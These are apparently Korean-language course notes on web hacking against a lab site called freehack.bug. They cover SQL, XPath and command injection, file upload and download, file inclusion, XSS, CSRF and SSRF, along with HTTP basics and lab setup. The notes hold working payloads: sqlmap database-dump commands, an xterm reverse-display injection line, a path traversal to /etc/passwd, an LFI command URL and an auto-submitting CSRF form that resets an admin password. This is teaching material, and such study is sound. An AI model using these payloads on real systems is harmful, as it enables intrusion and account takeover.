u "http://freehack.bug/?main=/board/board_view.php3&no=232" --dbs

u "http://freehack.bug/?main=/board/board_view.php3&no=232" -D freehack --tables -u "http://freehack.bug/?main=/board/board_view.php3&no=232" -D freehack -T member --columns

u "http://freehack.bug/?main=/board/board_view.php3&no=232"

XPATH INJECTION

조작된 XPath(XML Path Language) 쿼리를 보냄으로써 비정상적인 데이터를 쿼리해 올 수 있는 취약점으로, XML 문서에 데이터를 저장하는 웹사이트는 사용자가 입력한 내용의 데이터를 찾기 위해 XPath를 사용 하고, 이런 입력이 필터링이나 보안을 고려하지 않은 채 XPath 쿼리 안에 입력된다면 웹사이트의 로직을 손상시키거나 특정 데이터를 추출할 수 있게 된다.

-> XPath 인젝션은 사용자가 입력한 데이터가 제대로 검증되지 않을 때 발생하는 취약점으로, 이로 인해 공격자는 웹사이트의 데이터를 유출하거나 조작할 수 있게 됩니다.

http://freehack.bug/XML/

대응 방안

-> 입력 값 검증 필요

-> XPATH parameterized 사용

Command INJECTION

-> 프로그램이 외부에서 입력 받은 시스템 명령어를 검증하지 않고 실행하는 경우 의도하지 않은 시스템 명령어가 실행될 수 있는 취약점이다.

• 공격 유형 -> 부적절한 권한 변경 ->시스템 권한 획득 -> 시스템 동작/운영에 악영향

개발자가 리눅스나 관련 명령어 프로그램을 짜는데 웹상에서 커멘드를 쉽게 찾을 수 있게 해논 것

리버스 텔넷 / SS터널링 / DNS 터널링

• 리버스텔넷

리버스 텔넷(Reverse Telnet)은 일반적으로 원격 장치와의 통신을 위해 사용하는 텔넷(Telnet) 프로토콜의 변형입니다. 이 기술은 특정 장치에 대한 원격 접근을 가능하게 하며, 주로 네트워크 장비나 IoT(사물인터넷) 디바이스에서 사용됩니다.

아래 사진에 넣기

ls ; xterm -display 192.168.1.40:1.0 &

• 정상적으로 텔넷 거는게 아니라 서버쪽에서 클라이언트 피씨 쪽으로 텔넷을 건다

 가급적 시스템 명령어 사용 금지  외부에서 전달되는 데이터와 조합 금지  필터링을 통한 다중 명령 실행 금지

파라미터 조작

• 웹 어플리케이션 상에 존재하는 모든 실행경로에 대해서 접근제어를 검사하지 않거나 미흡한 경우 공격자가 접근 가능한 실행경로를 통해 사용자의 정보를 유출 하거나 일시적인 권한 상승이 가능한 취약점.
• URL/파라미터 변조의 경우 불충분한 인증 및 인가 취약점과 유사하지만 프로세스 검증을 우회하는 것 이외에 사용자 입력 값에 대한 검증 누락이 발생하는 모든 상황을 포함하고 있으므로 SQL 인젝션, 불충분한 인증 및 인가, 크로스 사이트 스크립트 (XSS) 공격에 활용될 수 있음

네이버 카페 같은 곳에서 운영자가 이 Query를 통해 게시글을 최상단(공지)으로 고정 시킬 지 정한다 → 취약점 발생 -> web proxy tool을 통한 쿼리를 조작해서 내 마음대로 최상단에 내 게시글을 고정할 수 있음

http://freehack.bug/member/member_modify2.html?id=test

http://freehack.bug/member/member_modify2.html?id=admin

인증권한 체크 부실로 발생함

관리자권한으로 바꿀 수 있음

웹 어플리케이션에서 제공하는 정보와 기능을 역할에 따라 배분함으로써 사용자가 변경할 수 있는 데이터의 노출을 최소화하는 것이 필요하며, 서버로 전송된 사용자 입력 값의 경우 세션 및 데이터베이스와 비교를 하여 데이터가 변조되었는지 검증할 수 있는 과정을 구현해야 함

→ 세션을 가지고 인증체크를 하라는 말

IT정보보호 구축 가이드 - sk 쉴더스 발행 3.0 나옴

FILE UPLOAD

파일이 첨부되서 올라오는지를 잘 확인해야함 - 공격자는 웹 쉘을 업로드해서 모든 정보를 열람 가능하게 만들 수 있다.

• 취약점 설명 

-> 파일 업로드 취약점이랑 서버에 파일이 업로드 되는 기능을 이용하여, 업로드 된 파일을 웹 서버에 요청할 때, 웹 서버가 Server Side Script로 해석하여 생기는 취약점

-> 웹 사이트의 파일 업로드 기능을 이용하여 인가 받지 않은 파일을 서버 에 업로드 하는 공격 

• 공격 유형

1. WebShell 업로드 

2. DOS(Disk Full)

3. 시스템 권한 획득

이 표는 APM 스택을 포함한 웹 서버, 데이터베이스, 서버 사이드 스크립트 및 파일 확장자를 간단히 정리한 것입니다. 각 웹 서버와 그에 대응하는 데이터베이스 및 스크립트 언어의 조합을 보여줍니다.

• 악성파일 업로드

▪ 공격 시나리오 : 웹쉘 형태의 파일을 업로드 후 실행하면 서버의 자원을 장악할 수 있음

▪ 파일 업로드 공격은 1.파일이 업로드 되어야 하고 2.업로드 경로를 알 수 있어야 하고, 3.실행 권한이 있어 실행시킬 수 있어야 함

웹사이트 게시글 작성 할때 php 파일을 업로드 하지 못하게 막아놨다. -> 코드를 통해 확장자 파일이 . 으로 구분이 된다는 것을 알았다

그래서 앞에 .jpg 를 사용함으로써 코드의 헛점을 노려 우회할 수 있다.

아래의 사진은 유명한 C99Shell(웹쉘)화면

FILE DOWNLOAD

파일 다운로드 취약점이란 서버에 업로드 된 파일을 다운로드 받을 수 있게 만들어진 서비스를 이용하여, 정해진 파일이 아닌 다른(시스템 파 일, 소스 코드 등)파일을 다운로드 받을 수 있는 취약점이다.

다른파일은 시스템파일(etc의 패스워드 파일, hosts 파일 같이 없어서는 안되는 파일들) 이나 소스 코드가 될 수 있다.

개발자가 의도하지않게 다른 파일을 의도하는 것

**커멘드 인젝션- 개발자가 의도하지않게 다른 파일도 같이 수행하는 것

기존 URL

http://freehack.bug/board/board_down.php3?file_name=c99.php

공격 실행

URL에 아래와 같이 작성하면 루프가 돌면서 etc/passwd 파일을 받을 수 있음

http://freehack.bug/board/board_down.php3?file_name=/../../../../../../etc/passwd 

./ 를 강제로 지우는 아래와 같은 코드가 있으면 

-> ..// 이런식으로 두번 적으면 ./ 가 지워져도 ./ 한묶음이 남기 때문에 우회할 수 있다.

공격 유형

• 소스 코드 유출 - 어느정도 경로를 알아야지 할 수 있음
• 중요 파일 유출
• 데이터베이스 정보 유출 - 디비 연결정보 파일
• DownLoad 취약점
• 저장된 경로 찾기(이미지/에러베이스 등)
• 필터링 우회 • 대응 방앆
• 필터링을 통한 차단
• 직접 링크보다는 간접링크 사용 • 갂접 링크를 통한 필터링 및 접근 제어(악성코드/FlashGet 등)

개발자가 의도하지 않는 행위를 할 수 있는 것

INCLUSION ATTACK

페이지를 렌더링 할 때 웹 페이지에 동적으로 포함되는 INCLUDE 파일 을 사용하면 한 콘텐츠를 사이트의 여러 페이지에 쉽게 포함시킬 수 있는 기능을 악용하여 사용할 수 있는 취약점이다.

->INCLUDE 파일은 웹 페이지에서 공통 콘텐츠를 쉽게 재사용할 수 있도록 도와주지만, 잘못 사용하면 보안 취약점이 생길 수 있습니다. 공격자가 악의적인 코드를 포함한 파일을 서버에 업로드하고 이를 INCLUDE하면, 사용자에게 악성코드가 실행될 수 있습니다. 따라서 INCLUDE 파일 사용 시 보안에 주의해야 합니다.

Include/require/require_ once/include_ once

• RFI - Remote File inclusion

외부에 존재하는 컨텐츠를 동적 로드 가능

allow_url_fopen 허용 시 동작

http/ftp 등 다양한 프로토콜 지원

외부 서비스(블로그, 카페, 자료실 등)를 통한 공격 가능

원격에 있는 파일을 사용해서 명령을 수행

• LFI - Local File inclusion → 로컬에 있는 파일을 인크루드 시켜서 발생하는 취약점

내부에 존재하는 컨텐츠를 동적으로 로드 가능.

• Log 파일, 홖경 변수, 자료실 등 이용.

http://freehack.bug/?main=/data/cmd.txt&cmd=id

인클루드 함수를 잘못써서 외부나 내부에 있는 함수를 잘못 인클루드해서 프로그램이 실행되는 것

기타 웹공격 기법

관리자페이지 노출

• 아래와 같이 추측하기 쉬운 관리자 페이지는 가급적 피하도록 한다. 이런식으로 관리자 페이지 접속하고 → SQL INJECTION

http://admin.victim.comhttp//www.victim.com/admin

http://www.victim.com/manager/http://www.victim.com/master/http://www.victim.com/system

사용자 인증 부재 취약점

http://freehack.bug/admin/member/**member_list..php3**

유추할 수 있는 이름으로 지정하면 찍어서 맞출 수 있다.

이용자 인증정보 재사용

▪ 개요 : 세션 값을 훔쳐 타 사용자 이용 환경에서 사용 시 훔친 세션 값의 인증 및 권한을 그대로 가지고 있는 취약점/공격

▪ 예상 가능 공격 : 타 사용자 권한 탈취 후 서비스에 따른 공격 예) 금융 앱에서 피해자의 계좌에서 공격자의 계좌로 송금

▪ 취약점 확인 방법 : 세션값을 복사 후 타 PC 에서 사용해보고 복수의 위치에 서 세션값이 사용 가능한지 확인

▪ 보안 방법 ➢ 처음 세션 발급 시 IP정보를 세션 변수에 담아 두었다가 이 후 동일한 세션값을 가지는 클라이언트가 접속 시에 비교함 ➢ 금융기관에서는 내부망 IP 정보도 세션을 나누어 분배하므로 클라이언트/서버 프로그램을 설치하여 MAC주소 비교하여 세션 재 사용 취약점에 대응함 ➢ 중복 로그인을 차단

• 유추가능한 인증정보 이용(세션), 불충분한 세션종료 처리 말로 설명 • 고정된 인증정보 재사용

TEST 준비

1번 GET POST 메소드

2번 응답값 200ok 

3번 File download 취약점 

4번 CSRF  SSRF

5번 ???

• 윈도우서버 2019 설치

윈도우 서버 2019는 마이크로소프트에서 개발한 서버 운영 체제입니다. 이 운영 체제는 다양한 서버 기반의 작업을 수행하기 위해 설계되었으며, 기업 및 기관에서 주로 사용됩니다.

* 가상 머신(VMware)에서 Player -> manage -> virtual machine setting - CD/DVD - use ISO image file - > browser → 다운 받은 Window 2019 ISO파일 선택

• IIS 설치

IIS(Internet Information Services)는 마이크로소프트의 웹 서버 소프트웨어입니다. 이를 통해 웹 사이트를 호스팅하고, 웹 애플리케이션을 운영할 수 있습니다. IIS를 설치하면 웹 서버 기능을 사용하여 다양한 웹 서비스를 제공할 수 있습니다.

• MSSQL 2019 설치

MSSQL(마이크로소프트 SQL 서버)은 데이터베이스 관리 시스템(DBMS)으로, 데이터베이스를 생성하고 관리하는 데 사용됩니다. MSSQL 2019는 최신 버전 중 하나로, 다양한 데이터 저장 및 처리 기능을 제공합니다. 이를 통해 애플리케이션에서 데이터를 효율적으로 관리할 수 있습니다.

이 세 가지 요소는 함께 사용되어 웹 애플리케이션을 구축하고 운영하는 데 필요한 기본적인 인프라를 제공합니다. 예를 들어, IIS에서 웹 사이트를 호스팅하고, MSSQL에서 데이터를 관리함으로써 동적인 웹 서비스를 제공할 수 있습니다.

Web proxy tool (burp suite)

프록시설정 -> 프록시 서버 사용 켬 

로컬 리스트 127.0.0.1

포트 8080

웹브라우저에서 요청시 burp suite 로 인터셉트 -> 코드 점검&수정 -> forward -> 브라우저 접속

* 만약 8080 포트를 다른곳에서 사용하고 있으면 충돌이 나서 burp suite가 정상작동 되지 않을 수 있다. → 8080 포트에 연결되어 있는 프로그램을 내리거나 포트를 임의로 정해서 바꿔줄 수 있다.

proxy- options - proxy listener - edit 8080포트를 예를들어 8888 으로 바꾼다. 이렇게 변경 할 경우, 수동 프록시 설정 포트도 동일한 값으로 바꿔야한다.

WAR GAME

• 클라이언트 사이드에서 해결하는법

브라우저 요청 -> burp suite 인터셉트 -> 코드 수정 -> forward -> 통과

• 서버 사이드에서 해결하는법

브라우저 요청 -> 새로고침 -> burp suite 인터셉트 -> HTML 코드 수정 -> forward -> 통과

OWASP TOP 10

Open Web Application Security Project에 따라 악용가능성, 탐지가능성 및 영향에 대해 빈도수가 높고 보앆상 영향을 크게 줄 수 있는 10가지 웹 애플리케이션 보앆 취약점 목록

• A01 : Broken Access Control (접근 권한 취약점)
• A02 : Cryptographic Failures (암호화 오류)
• A03: Injection (인젝션)
• A04: Insecure Design (안전하지 않은 설계)
• A05: Security Misconfiguration (보안설정오류)
• A06: Vulnerable and Outdated Components (취약하고 오래된 요소)
• A07: Identification and Authentication Failures (식별 및 인증 오류)
• A08: Software and Data Integrity Failures(소프트웨어 및 데이터 무결성 오류)
• A09: Security Logging and Monitoring Failures (보안 로깅 및 모니터링 실패)
• A10: Server-Side Request Forgery (서버 측 요청 위조)

CROSS SITE SCRIPT(XSS)

사용자 요청에 의해 검증되지 않은 외부 입력 데이터(악의적/부적절한 스크립트)가 포함된 동적 웹페이지가 생성/전송되는 경우, 사용자가 해 당 동적 웹페이지를 열람함으로써 웹페이지에 포함된 악의적/부적절한 스크립트가 실행되는 공격이다.

- 악의적인 사용자가 게시글을 업로드하고 관리자가 게시글을 읽으면 cookies값이 해커에게 넘어간다. 

공격 시나리오

• 사용자의 개인정보 탈취 : Keylogger 형태의 스크립트를 사용하여 키보드 입력값 탈취
• 사용자의 쿠키정보 탈취 : document.cookie를 사용하여 해당 사용자의 쿠키/세션값 탈취
• 악성코드 다운로드 또는 실행 : 악성코드 다운로드 링크 연결, 낮은 보안 수준에서의 자동실행
• 피싱 사이트로 강제 이동 : location.href 등을 사용하여 페이지 강제 이동

*토막상식 : drm은 문서가 외부로 유출되었을때 열리지 않게 암호화를 하는 것

공격종류

Reflected XSS (반사형 크로스사이트 스크립팅),

Stored XSS (저장형 크로스사이트 스크립팅),

DOM Based XSS (DOM 기반 크로스사이트 스크립팅)

Stored XSS (저장형 크로스사이트 스크립팅)  - 서버와 통신 // 게시판에 삽입

악성 스크립트가 서버에 저장된 후, 다른 사용자가 해당 스크립트가 포함된 데이터를 요청할 때 실행되는 공격 방식입니다. 이 유형의 XSS는 일반적으로 데이터베이스에 사용자 입력이 저장되는 경우 발생합니다.

공격 과정

1. 악성 스크립트 입력: 공격자는 웹 애플리케이션의 입력 필드(예: 댓글, 게시물, 프로필 등)에 악성 JavaScript 코드를 포함하여 데이터를 입력합니다. 예를 들어, <script>alert('XSS');</script>와 같은 코드를 입력할 수 있습니다.
2. 서버에 저장: 입력된 데이터는 서버의 데이터베이스에 저장됩니다. 이때, 입력 값에 대한 검증이나 인코딩이 이루어지지 않으면, 악성 스크립트가 그대로 저장됩니다.
3. 다른 사용자 요청: 이후 다른 사용자가 해당 데이터에 접근할 때(예: 댓글 목록 보기), 웹 애플리케이션은 저장된 데이터를 불러와 웹 페이지에 표시합니다.
4. 스크립트 실행: 사용자의 브라우저는 페이지를 렌더링하면서 저장된 악성 스크립트를 실행하게 됩니다. 이를 통해 공격자는 사용자 세션 정보, 쿠키, 기타 민감한 정보를 탈취할 수 있습니다.

Reflected XSS (반사형 크로스사이트 스크립팅) - 서버와 통신 // 파라미터에 삽입

공격자가 악성 스크립트를 포함한 URL을 생성하고 이를 사용자가 클릭하게 하여, 해당 스크립트가 웹 페이지에서 실행되도록 하는 공격 방식입니다

사용자의 브라우저는 이 페이지를 로드하면서 악성 스크립트를 실행하게 됩니다. 반사형 XSS의 주요 특징은 악성 코드가 서버에 저장되지 않고, 요청과 응답 과정에서 즉각적으로 반사된다

DOM Based XSS (DOM 기반 크로스사이트 스크립팅) - 서버와 통신하지 않는다

DOM Based XSS(=type-0 XSS)는 피해자의 브라우저에서 DOM 환경을 수정하여 클라이언트 측 코드가 예상치 못한 방식으로 공격 구문이 실행되는 XSS(Cross Site Scripting) 공격입니다. 즉, 페이지 자체(HTTP 응답)는 변경되지 않지만, 페이지에 포함된 클라이언트 측 코드는 DOM환경에서 발생한 악의적인 변조로 인해 공격 구문이 실행됩니다.

• 브라우저 자체에서 DOM을 통해서 실행이 된다.
• 일반적으로 메일의 링크를 통해서 전달 -> 사용자가 악의적인 링크를 클릭하도록 유도

• DOM 기반 XSS 공격 시나리오

- 악의적인 사용자가 보안이 취약한 웹 페이지를 발견했습니다.
- 보안이 취약한 웹 페이지에서 악성 스크립트가 실행되도록 URL 주소를 만들어 일반 사용자에게 전달합니다.
- 일반 사용자는 메일 등을 통해 전달받은 URL 링크를 클릭합니다. 서버로부터 HTML 문서를 전달받습니다.
- 사용자의 브라우저가 응답 받은 HTML 문서를 읽으면서 필요한 스크립트를 실행하는 중에 악성 스크립트가 동작합니다.
- 악성 스크립트를 통해 사용자 정보가 악의적으로 전달됩니다

Cross Site Script (CSRF) - client side

Cross Site Request Forgery, 웹사이트 취약점 공격의 하나로, 사용자가 자싞의 의지와는 무관하게 공격자가 의도한 행위(수정, 삭제, 등록 등)를 특정 웹사이트에 요청하게 하는 공격을 말한다.

ex) 회원 정보 수정, 데이터 수정 또는 삭제, 비방/욕 댓글

- 해커의 악의적인 스크립트 게시글을 관리자가 읽으면 관리자 계정의 비밀번호가 해커가 설정한 비밀번호로 바뀔 수 있다.

- 클라이언트 사이드에서 계정정보를 바꾸는 공격 -> 클라이언트의 정보가 목표, 서버의 공격이 아니다.

• 해커가 아래 스크립트를 이용해 악의적인 게시글(본문에 스크립트 삽입)을 작성한다.
• 관리자가 게시글을 읽으면 아래의 스크립트에서 설정한 것처럼 관리자 계정의 비밀번호가 12345 로 바뀐다.

<form action="http://freehack.bug/member/member_modify.php3" method="post" name="join"><input type="password" name="pass" value="12345" /><input type="password" name="pass2" value="12345" /><input type="text" name="username" value="Admin" /><input type="text" size=30 name="email" value="admin@freehack.com" /><input type="text" size=80 name="addr" value="Korea!!" /><input type="text" size=5 name="zipcode1" value="111" /><input type="text" size=5 name="zipcode2" value="222"/><textarea name="comment" rows="5" cols="50">Hacked by Kioo</TEXTAREA></form><script>document.join.submit();</script>

Server Side Request Forgery (SSRF) - server side

SSRF는 Server Side Request Forgery의 약자로 유사한 이름을 가진 CSRF(Cross Site Request Forgery) 와는 다르게 클라이언트 측의 요청 을 변조시키는 것이 아닌 서버 측 자체의 요청을 변조하여 공격자가 원하는 형태의 악성 행위를 서버에 던져주면 서버가 검증 없이 그대로 받아 그의 따른 행동/응답을 해주는 공격

* 공격자가 내부망에 있는 서버를 접근 하기 위해서는 직접 접근은 불가 (방화벽, IDS, IPS …. 등) 보안장치가 많다. 심지어 해커(공인아이피)에서 server(사설아이피) 가 보이지도 않는다.

-> 중간에 있는 server의 취약점(매개체역할)을 통해 서버(사설 아이피)를 공격할 수 있다.

SSRF공격을 통해 hacker.bug의 index.html 텍스트(Hacker Page)를 웹 브라우저에 삽입 시킬 수 있다.

또는 

아래와 같은 방법으로 SSH version 정보를 확인할 수 있다. - 다양한 방법으로 사용가능

보안대책

• 내부 시스템과 상호 작용하는 변수에 불필요한 값이 입력될 경우 무효처리를 해야 됨
• 변수에 입력된 주소가 올바른 주소가 맞는지 즉 신뢰하는 주소가 맞는지 재검증을 해야 됨

실습에서 hacker.bug 가 믿어도 되는 URL인지 확인할 수 있는 로직을 삽입해야한다.

접근할 수 있는 사이트만 접근할 수 있게하고 접근하면 안되는 사이트는 전부 거절 (화이트리스트)

정상적인 요청으로 공격하기 때문에 웹 방화벽에서 통제가 되지 않는다.

• 여러 우회 공격 기법 중 대상 사이트에 대한 신뢰할 수 있는 도메인과 루프백 주소를 매칭하여 지정해둔 도메인을 요청하는 경우가 존재하기 때문에 요청 시 도메인 이름에 대한 검증도 수행

웹 구조 및 기본지식(HTTP 프로토콜)

• HTTP(Hyper Text Transfer Protocol)

WWW 상에서 주로 HTML 문서를 주고 받는데 사용되는 어플리케이션 계층의 요청/응답 프로토콜

텍스트 형태의 프로토콜

web server와 DB server랑 따로 떨어트려놓는 것이 더 안전합니다.

• >ipconfig /displaydns

Windows 운영체제에서 DNS 캐시를 표시하는 명령입니다. 이 명령어를 실행하면, 현재 시스템에 저장된 DNS 레코드 목록이 나타납니다. DNS 캐시는 웹사이트의 도메인 이름을 IP 주소로 변환하기 위해 사용되며, 이를 통해 웹사이트에 더 빠르게 접근할 수 있습니다.

• >ipconfig /flushdns

Windows 운영체제에서 DNS 캐시를 비우는 명령입니다. 이 명령을 실행하면 현재 시스템에 저장된 모든 DNS 레코드가 삭제되고, 다음 번에 웹사이트에 접근할 때 새로운 DNS 정보를 요청하게 됩니다.

• hosts

hosts 파일은 컴퓨터의 운영 체제에서 도메인 이름을 IP 주소로 변환하는 데 사용되는 간단한 텍스트 파일입니다. 이 파일은 DNS(Domain Name System)보다 우선적으로 참조되어, 특정 도메인 이름에 대해 지정된 IP 주소를 매핑합니다.

• nslookup 

DNS 서버에 대한 쿼리를 수행하여 도메인 이름에 대한 IP 주소나 기타 DNS 레코드를 확인하는 데 사용됩니다.

• DHCP(Dynamic Host Configuration Protocol)

DHCP 서버(Dynamic Host Configuration Protocol Server)는 네트워크에서 클라이언트 기기에 자동으로 IP 주소와 기타 네트워크 설정을 할당하는 서버입니다.

ipconfig /all

DNS 서버는 두개가 있는데 하나가 죽으면 다른 하나가 활성화된다.

네이버 아이피가 한대이면 전세계 사람들의 부하를 버틸 수 없기때문에 부하를 분산시키기 위해 아이피가 4개로 설정함

• nslookup에서 DNS 서버를 변경할 수 있다.

기본적으로 시스템에서 설정된 DNS 서버 대신 다른 DNS 서버를 지정하여 쿼리를 수행할 수 있다는 것입니다. 이를 통해 특정 DNS 서버의 응답을 받아보거나 DNS 문제를 진단하는 데 유용합니다.

Host 헤더란?

Host 헤더는 웹사이트에 요청을 보낼 때, "나는 이 특정 웹사이트를 요청해요!"라고 서버에 알려주는 역할을 합니다.

왜 필요한가요?

• 여러 웹사이트: 하나의 서버에서 여러 웹사이트가 운영될 수 있습니다. 예를 들어, www.google.com과 www.example.com이 같은 서버에 있을 때, 서버는 요청이 어떤 웹사이트에 대한 것인지 알아야 합니다. 이때 Host 헤더가 필요합니다.

예시

예를 들어, 웹 브라우저에서 www.google.com에 접속하려고 하면, 브라우저는 다음과 같은 요청을 서버에 보냅니다:

GET / HTTP/1.1
Host: www.google.com

여기서:

• GET / HTTP/1.1: "웹사이트의 첫 페이지를 요청합니다."
• Host: www.google.com: "나는 구글 웹사이트를 요청해요!"라고 서버에 알려줍니다.

요약

즉, Host 헤더는 서버가 어떤 웹사이트에 대한 요청인지 알 수 있도록 도와주는 정보입니다. 추가 질문이 있으면 언제든지 말씀해 주세요!

User-Agent는 클라이언트(브라우저)가 서버에 "나는 어떤 브라우저와 운영 체제를 사용하고 있어!"라고 알려주는 정보입니다.

Referer : 바로 전에 어떤 페이지를 접속을 했는지 보여준다.

HTTP 응답의 구조와 각 헤더의 역할을 설명하는 예시

HTTP Version | 상태코드 | 코드설명

• HTTP Version: 1.1: 현재 사용 중인 HTTP 프로토콜의 버전을 나타냅니다. 여기서 1.1은 HTTP/1.1 버전으로, 웹에서 가장 많이 사용되는 버전 중 하나입니다. HTTP는 주로 1.0, 1.1, 2.0, 3.0 등의 버전이 있습니다.
• 상태 코드: 서버가 클라이언트의 요청을 처리한 후, 요청의 결과를 숫자로 표기하는 것입니다. 예를 들어:
  • 200: 요청이 성공적으로 처리되었음을 의미합니다.
  • 404: 요청한 페이지를 찾을 수 없음을 의미합니다.
  • 500: 서버 내부 오류가 발생했음을 의미합니다.
• 코드 설명: 상태 코드에 대한 설명을 제공합니다. 예를 들어, 200 상태 코드는 "OK"라고 설명하며, 이는 요청이 성공적으로 처리되었음을 나타냅니다.

Header Name: Header Value

• Server 헤더는 HTTP 응답에서 서버가 사용하는 소프트웨어에 대한 정보를 제공합니다. 이 헤더는 서버의 종류와 버전, 그리고 때로는 사용 중인 운영 체제에 대한 정보를 포함할 수 있습니다.

Body

응답값을 HTML 태그를 가져와서 해석해서 보내주는 것 // 응답 본문 부분으로, 여기서는 "Google"이라는 내용이 포함되어 있습니다.

CVE(공통 취약점 및 노출, Common Vulnerabilities and Exposures)는 정보 보안 분야에서 알려진 취약점과 노출을 식별하고 관리하기 위한 표준화된 시스템입니다.

• CVE-2024-0111 (2024년의 첫번째 취약점이다. - 신고해서 취약점을 추가하는 방식인듯)
• KVE : 한국에서 만든 CVE

GET :

• GET 요청은 서버에서 리소스를 가져오는 데 사용됩니다. 일반적으로 GET 요청은 본문이 필요하지 않습니다. 요청할 URL만으로도 충분히 서버가 어떤 리소스를 반환해야 하는지를 알 수 있습니다.
• 파라미터 값이 한줄으로 나온다. (글자수 제한 255자가 있다)

https://search.naver.com/search.naver?where=nexearch&sm=top_hty&fbm=0&ie=utf8&query=test

POST : 

• 파라미터 값이 안보이게 숨겨져있음 (어떤 인자값이 날라가는지 보이지 않기 때문에 안전하다고 하지만 web proxy tool을 사용할 경우 전부 보이기 떄문에 공격자 입장에서는 GET과 POST는 의미가 없습니다. (글자수 제한이 없다 서버적으로 보내야할 데이터가 많으면 POST 사용)

https://search.naver.com/search.naver

• DELETE : 특정 서버에 올라가있는 자원들을 삭제할때 사용 (만약 네이버가 DELETE 를 허용해 놓고 쓰면 악의적인 사용자가 삭제를 할 수있어서 항상 허용을 차단해놔야한다.
• PUT: 지정된 리소스에 전달된 데이터 저장 // 중요해서 항상 지정설정을 해놔야한다.
• HEAD: 테스트 할때 사용
• OPTIONS: 웹서버에 어떤 메소드가 허용되어 있는지 확인할 수 있다.
• TRACE : 요청한 request를 그대로 반환

• 대중적으로 많이 사용되는 PORT number

HTTP 80

HTTPS 443

FTP 21

telnet : 24

SSH 22

SMTP: 25

Query String : 프로그램과 쿼리스트링의 구분자는 ‘?’ 이다.

field :  파라미터 (인자)

value : 파라미터 값 (인자값)

& : 각 변수의 구분자

URL encoding : 플레인 텍스트와 똑같다 (툴을 이용하면 그냥 풀림) 암호화가 아니다.

형태는 % 나 + 으로 되어있음 → 인코딩, 디코딩 검색해서 그냥 풀 수 있다.

• Base64 또한 encoding 이랑 똑같음 암호화는 아니고 쉽게 풀림

• Server Side Script

• Client Side Script

• HTML 문서와 트리 구조

• Cookie & Session

실습(1) // 웹 프록시 툴 설치 및 활용 (Burp suite)

Web proxy tool (burp suite(대중적), fiddler … )

Window OS 기준 실습

1. 웹 브라우저에서 proxy 설정 

네트워크 및 인터넷 -> 프록시 -> 프록시 서버 편집 -> 프록시 서버 사용 ON -> 아래 세팅 값 입력

web browser에서 모든 web에 대한 요청을 burp suite로 던지게 하기 위함 / 설정을 안해주면 요청을 burp suite로 안통하고 그냥 서버쪽으로 보내버린다. (최근 버젼에서는 Burp suite 자체 브라우저를 사용하면 프록시 설정을 안해줘도 됌)

   2. burp suite 세팅

 Proxy → Options -> Intercept Server Responses → intercept responses based on the following rules TICK (서버에 응답값을 받는 설정)→ 인터셉트 on 하고 브라우저를 열면 인터셉트 시작

 forward을 누르면서 순차적으로 요청값을 검사 또는 수정할 수 있다.

요청이 완전히 다 끝날 때까지 forward 버튼을 누르면 브라우저가 정상적으로 열리는 것을 확인 할 수 있음.

실습(2) // 웹 프록시 툴 설치 및 활용 (VMware-player-full, MobaXterm_Installer_v23.0)

가상머신 : VMware(무료), Virtual box(무료), Pararell(유료)

Linux : CentOS

원격 데스크톱 클라이언트 : MobaXterm

• CentOS(센토스)는 오픈 소스 리눅스 배포판으로, Red Hat Enterprise Linux(RHEL)를 기반
• MobaXterm은 직관적인 인터페이스를 제공하여, 초보자도 쉽게 사용할 수 있습니다. 복잡한 설정 없이도 빠르게 원격 서버에 접속할 수 있습니다. 또한 MobaXterm에서 Unix/Linux 명령어를 사용할 수 있어, CentOS 서버에서 직접 명령어를 실행하고 결과를 확인 할 수 있습니다

SETUP

VMware을 통해 Centos 실행(ID,pwd 'centos) -> 내 ip주소 찾기 'ifconfig'-> MobaXterm실행 ( session -〉 SSH -> 내 아이피 삽입) -> 정상작동 확인(ID,pwd 'centos)

**아이피가 안나올때 IP받아오는법**

centos -> manage - > virual -network 어뎁터→ 디바이스 상태 connected →네트워크커넥션 NAT

sudo su -

ifdown ens33

ifup ens33

CentOS 7 버전 리눅스에서 Kakao 서버의 외부 YUM Repository 설정

• CentOS 7에서 Kakao 서버의 외부 YUM Repository를 설정하면 소프트웨어 설치와 관리가 용이해지고, 최신 버전과 보안 패치를 쉽게 받을 수 있습니다. 이를 통해 안정적이고 효율적인 시스템 운영이 가능합니다.
• YUM(Yellowdog Updater, Modified)은 리눅스 기반 시스템에서 소프트웨어 패키지를 관리하기 위한 패키지 관리 도구입니다. 주로 Red Hat 계열의 배포판(예: Centos, Fedora, RHEL)에서 사용됩니다. YUM은 패키지 설치, 업데이트, 제거 및 의존성 관리를 자동으로 처리하여 시스템 관리의 편리함을 제공합니다.

MobaXterm command 화면에서 아래의 명령어를 입력합니다.

vi /etc/yum.repos.d/CenOS-Base.repo

CentOS7 버전 리눅스에서 KaKao 서버의 외부 YUM RCentOS 시스템에서 YUM 패키지 관리자가 사용하는 리포지토리 설정 파일을 열기 위한 것입니다. 이 파일을 수정하여 패키지 소스를 변경하거나 추가할 수 있습니다.

화면이 전환되면 I(insert) 버튼을 클릭 한 후 아래의 yum설정 메모장에서 

[base] ~~~~~~ gpgkey=file:///etc/pki/rpm-gpg/RPM-GPG-KEY-CentOS-7 까지 복사 -> 붙여넣기    

esc (수정 옵션에서 빠져나오기) -> :wq (저장) 합니다.

아래의 명령어를 한줄씩 삽입하여 Maria DB 와 apache 설치하기.

MariaDB는 MySQL의 오픈 소스 관계형 데이터베이스 관리 시스템(RDBMS)으로, MySQL의 포크(fork) 버전입니다. MySQL의 원래 개발자들이 MySQL의 소유권이 Oracle에 넘어간 후, MySQL의 기능을 유지하고 개선하기 위해 개발되었습니다

Apache HTTP Server(일반적으로 Apache라고 불림)는 오픈 소스 웹 서버 소프트웨어로, 전 세계에서 가장 널리 사용되는 웹 서버 중 하나입니다. Apache는 다양한 운영 체제에서 실행되며, 웹 콘텐츠를 사용자에게 제공하는 데 필요한 기능을 제공합니다.

PHP(풀 네임: PHP: Hypertext Preprocessor)는 서버 사이드 스크립트 언어로, 웹 개발에 주로 사용됩니다. 동적 웹 페이지를 생성하고 데이터베이스와 상호작용하는 데 매우 유용합니다.

(PHP 테스트를 하면 보여지는 창)

phpMyAdmin은 MySQL 및 MariaDB 데이터베이스를 관리하기 위한 오픈 소스 웹 기반 도구입니다. PHP로 작성되어 있으며, 사용자 친화적인 인터페이스를 통해 데이터베이스를 쉽게 관리할 수 있게 해줍니다.

(웹 상에서 데이터베이스 테이블을 만들거나 컬럼을 만드는것을 편하게 하기 위한 패키지 프로그램이다.)

http://192.168.x.x/phpmyadmin 접속확인

http://192.168.x.x/phpmyadmin 에서 아래와 같이 정보 입력

사용자명: root

암호: 1234

